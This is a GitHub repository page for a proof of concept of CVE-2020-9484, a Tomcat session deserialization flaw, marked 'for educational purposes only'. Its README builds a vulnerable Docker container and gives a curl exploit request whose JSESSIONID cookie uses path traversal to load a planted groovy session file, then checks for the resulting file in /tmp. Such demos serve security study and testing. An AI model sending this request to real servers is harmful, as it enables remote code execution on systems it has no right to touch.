Skip to content

masahiro331/CVE-2020-9484

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
Dockerfile
Dockerfile
 
 
README.md
README.md
 
 
context.xml
context.xml
 
 
groovy-2.3.9.jar
groovy-2.3.9.jar
 
 
groovy.session
groovy.session
 
 
index.jsp
index.jsp
 
 

Repository files navigation

CVE-2020-9484 (Tomcat)

For educational purposes only.

See Reference for the details.

Run

$ git clone https://github.com/masahiro331/CVE-2020-9484.git
$ cd CVE-2020-9484
$ docker build -t tomcat:groovy .
$ CONTAINER=`docker run -d -p 8080:8080 tomcat:groovy`

Check (clean)

$ docker exec -it $CONTAINER ls -la /tmp

NOTE: (rce NOT in output)

Exploit

$ curl 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy'

Check (exploited)

$ docker exec -it $CONTAINER ls -la /tmp

NOTE: (rce IS in output)

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

127 stars

Watchers

5 watching

Forks

30 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages